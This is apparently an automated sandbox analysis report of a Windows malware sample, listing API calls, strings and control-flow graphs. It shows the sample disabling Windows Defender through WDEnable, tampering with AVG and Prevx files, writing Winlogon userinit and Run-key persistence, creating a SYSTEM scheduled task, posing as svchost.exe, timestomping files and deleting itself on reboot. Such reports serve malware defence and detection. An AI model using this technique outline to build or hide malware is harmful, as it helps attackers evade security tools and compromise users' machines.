                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FileProcess$Handle$AllocateCloseCreateFreeInformationReadSizeValidateWritememset
                                                                                                                                                                                                            • String ID: '+@
                                                                                                                                                                                                            • API String ID: 995291462-3270456718

Control-flow Graph
• Function starting at 00401fc0 (graph figure not reproduced; executed/not-executed colouring lost in extraction)
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401FFE
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402014
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040202A
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 00402037
                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(MpClient.dll), ref: 00402046
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040205B
                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000), ref: 0040208C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                            • String ID: MpClient.dll$V,@$WDEnable$Windows Defender
                                                                                                                                                                                                            • API String ID: 1010965793-4204822615

Control-flow Graph
• Function starting at 00402560 (graph figure not reproduced; executed/not-executed colouring lost in extraction)
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040257F
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004025AD
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 004025C0
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(Windows Explorer), ref: 004025D2
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404E10,00000000,00004401,00404E20,?), ref: 004025FB
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404E30,00000000,00004401,00404E40,?), ref: 004026AF
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00402C95), ref: 0040273D
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00402744
                                                                                                                                                                                                            • CoUninitialize.COMBASE ref: 0040279E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                            • String ID: Windows Explorer
                                                                                                                                                                                                            • API String ID: 1140695583-228612681

Control-flow Graph
• Function starting at 00402240 (graph figure not reproduced; executed/not-executed colouring lost in extraction)
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004022D6
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 004022F6
                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 004022FC
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040231A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040231D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                            • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                            • API String ID: 3225117150-898603304
                                                                                                                                                                                                            • Opcode ID: f30bb11f5613f8d38f8c23486348982fdc31315c85d836d9b114ebf2302f727f
                                                                                                                                                                                                            • Instruction ID: c460779fd0431372b53d2531d074c5320f53f755a2dac54515a3a2487e8d4eb8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f30bb11f5613f8d38f8c23486348982fdc31315c85d836d9b114ebf2302f727f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA31F4B1C0121CAFDB10DFD5D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(00401C30,?,0000001C,00000000,00000000,7702DB30), ref: 0040298B
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004029A3
                                                                                                                                                                                                            • PathFileExistsA.KERNELBASE(?), ref: 004029C4
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 004029DC
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402A1D
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402A2D
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 00402A3E
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402A76
                                                                                                                                                                                                              • Part of subcall function 004012A0: GetTickCount.KERNEL32 ref: 004012AB
                                                                                                                                                                                                              • Part of subcall function 004012A0: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A82,00000000), ref: 004012BC
                                                                                                                                                                                                              • Part of subcall function 004012A0: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004012CC
                                                                                                                                                                                                              • Part of subcall function 00401330: GetTickCount.KERNEL32 ref: 0040135A
                                                                                                                                                                                                              • Part of subcall function 00401330: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A8E,-00000006,00000000), ref: 00401367
                                                                                                                                                                                                              • Part of subcall function 00401330: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401373
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00402AF0
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00402B08
                                                                                                                                                                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 00402B3A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402B65
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00402B68
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402B74
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00402B77
                                                                                                                                                                                                            • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402B96
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402BA5
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402BB5
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 00402BC6
                                                                                                                                                                                                            • GlobalFindAtomA.KERNEL32(Fri Jun 17 05:52:09 20111), ref: 00402BE4
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402BF5
                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32(Fri Jun 17 05:52:09 20111), ref: 00402C00
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                            • String ID: %s_$.dat$Fri Jun 17 05:52:09 20111$IsWow64Process$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                            • API String ID: 4049655197-4201755136
                                                                                                                                                                                                            • Opcode ID: 76f81366a4f8225247b8614753da15890ae233e837e64cdd9c16a62ed84d21ea
                                                                                                                                                                                                            • Instruction ID: 2b42465635bf5f89377a844675b664ed4d82d183fb77d3ed61f84ac94699b08c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76f81366a4f8225247b8614753da15890ae233e837e64cdd9c16a62ed84d21ea
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5718FB15143419BC310EF70DE8896B7BE9BBC8300B54493EF686B72A1D778D944CB99

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040243C
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004024A0
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004024C3
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024D8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 004024E4
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024F3
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 004024FF
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040250E
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040251A
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402529
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402535
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402544
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00402547
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                            • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                            • API String ID: 606440919-2829233815
                                                                                                                                                                                                            • Opcode ID: 8452569d89d16074c856ebe9e50090442212cf04daf89a05b4dc4c5533925dd3
                                                                                                                                                                                                            • Instruction ID: da06213ca23f861e298ab990455e1520987101534f77d1697d18ba9606f76a1b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8452569d89d16074c856ebe9e50090442212cf04daf89a05b4dc4c5533925dd3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03314871684218BEF311EB90DC96FEA7768EF89B00F104165F304AA1D0DBF16A45CBA9

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            control_flow_graph 198 402810-40284f RegCreateKeyExA 199 402855-4028b9 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 198->199 200 4028dd-4028fe RegCreateKeyExA 198->200 201 4028c0-4028c5 199->201 202 402900-402902 200->202 203 402924-40292a 200->203 201->201 206 4028c7-4028db 201->206 207 402905-40290a 202->207 204 40292c-402937 RegFlushKey RegCloseKey 203->204 205 40293d-402940 203->205 204->205 208 40291e RegSetValueExA 206->208 207->207 209 40290c-40291d 207->209 208->203 209->208
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040284B
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402866
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 00402873
                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 00402890
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 004028AB
                                                                                                                                                                                                            • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 004028FA
                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 0040291E
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(00000000), ref: 0040292D
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402937
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402833
                                                                                                                                                                                                            • software\microsoft\windows\currentversion\run, xrefs: 004028F0
                                                                                                                                                                                                            • SystemDrive, xrefs: 00402861
                                                                                                                                                                                                            • userinit, xrefs: 00402918
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                            • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            control_flow_graph 272 4013c0-401441 memset * 2 lstrcpynA CreateProcessA 273 401443-401453 272->273 274 40149f-4014a7 272->274 275 401455-40145e GetHandleInformation 273->275 276 40146d-401477 273->276 275->276 279 401460-401464 275->279 277 401491-40149c 276->277 278 401479-401482 GetHandleInformation 276->278 278->277 280 401484-401488 278->280 279->276 281 401466-401467 CloseHandle 279->281 280->277 282 40148a-40148b CloseHandle 280->282 281->276 282->277
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 004013D8
                                                                                                                                                                                                            • memset.MSVCRT ref: 004013FE
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,00402BDF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401416
                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401439
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00402BDF,?,?,?,00000000,00000000,00000000), ref: 0040145A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401467
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00402BDF,?,?,?,00000000,00000000,00000000), ref: 0040147E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040148B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                            • String ID: D

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            control_flow_graph 283 401b60-401b8c CreateFileA 284 401b92-401bae GetFileTime 283->284 285 401c25-401c2a 283->285 286 401bb0-401bbd GetHandleInformation 284->286 287 401bcc-401be9 CreateFileA 284->287 286->287 289 401bbf-401bc3 286->289 287->285 288 401beb-401c07 SetFileTime 287->288 288->285 290 401c09-401c16 GetHandleInformation 288->290 289->287 291 401bc5-401bc6 CloseHandle 289->291 290->285 292 401c18-401c1c 290->292 291->287 292->285 293 401c1e-401c1f CloseHandle 292->293 293->285
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402B87,?), ref: 00401B85
                                                                                                                                                                                                            • GetFileTime.KERNEL32(00000000,?,?,00402B87,?,?,?,?,?,00402B87,?,?,?), ref: 00401B9F
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402B87,?), ref: 00401BB5
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402B87,?), ref: 00401BC6
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402B87,?), ref: 00401BE2
                                                                                                                                                                                                            • SetFileTime.KERNELBASE(00000000,?,?,00402B87,?,?,?,?,?,00402B87,?), ref: 00401BF8
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402B87,?), ref: 00401C0E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402B87,?), ref: 00401C1F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401B80
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                            • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(00401C30,?,0000001C), ref: 004011EF
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00401205
                                                                                                                                                                                                            • PathFileExistsA.KERNELBASE(?), ref: 00401212
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401229
                                                                                                                                                                                                            • GetTempFileNameA.KERNELBASE(?,00000000,00000000,?), ref: 00401241
                                                                                                                                                                                                            • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040125D
                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040126C
                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(?), ref: 00401279
                                                                                                                                                                                                            • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040128D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            control_flow_graph 303 401000-401009 304 401090-401096 303->304 305 40100f-401012 303->305 305->304 306 401014-401016 305->306 306->304 307 401018-401035 CreateFileA 306->307 308 401086-40108d 307->308 309 401037-40104d WriteFile 307->309 310 40105f-401068 309->310 311 40104f-401058 SetEndOfFile 309->311 310->308 313 40106a-401077 GetHandleInformation 310->313 311->310 312 40105a 311->312 312->310 313->308 314 401079-40107d 313->314 314->308 315 40107f-401080 CloseHandle 314->315 315->308
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,00402B5B,00000000), ref: 0040102A
                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,[+@,?,00000000,00000000,?,?,00402B5B,00000000), ref: 00401045
                                                                                                                                                                                                            • SetEndOfFile.KERNELBASE(00000000,?,?,00402B5B,00000000), ref: 00401050
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0040106F
                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 00401080
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Handle$CloseCreateInformationWrite
                                                                                                                                                                                                            • String ID: [+@
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402348
                                                                                                                                                                                                            • MoveFileA.KERNEL32(?,?), ref: 0040240F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFolderMovePath
                                                                                                                                                                                                            • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000), ref: 0040208C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                            • String ID: V,@
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040348E
                                                                                                                                                                                                            • memset.MSVCRT ref: 004034AE
                                                                                                                                                                                                            • memset.MSVCRT ref: 004034CE
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 004034D6
                                                                                                                                                                                                            • GetVersionExA.KERNEL32 ref: 004034F1
                                                                                                                                                                                                              • Part of subcall function 004033A0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004033C7
                                                                                                                                                                                                              • Part of subcall function 004033A0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 004033E9
                                                                                                                                                                                                              • Part of subcall function 004033A0: OpenProcessToken.ADVAPI32(00000000), ref: 004033F0
                                                                                                                                                                                                              • Part of subcall function 004033A0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403411
                                                                                                                                                                                                              • Part of subcall function 004033A0: CloseHandle.KERNEL32(00000000), ref: 00403427
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403535
                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 0040354E
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004035AB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004035F7
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004035FE
                                                                                                                                                                                                            • memset.MSVCRT ref: 00403616
                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 00403630
                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403653
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040366A
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040367E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • 00-->, xrefs: 0040371F
                                                                                                                                                                                                            • <Actions , xrefs: 004036EA
                                                                                                                                                                                                            • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403477
                                                                                                                                                                                                            • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403454
                                                                                                                                                                                                            • task%d, xrefs: 0040353C
                                                                                                                                                                                                            • p=5w, xrefs: 0040382B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                            • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=5w$task%d
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040181B
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75435430,00000000,?), ref: 00401833
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040185D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401860
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401873
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401898
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004018AC
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004018CA
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                            • memset.MSVCRT ref: 004018DD
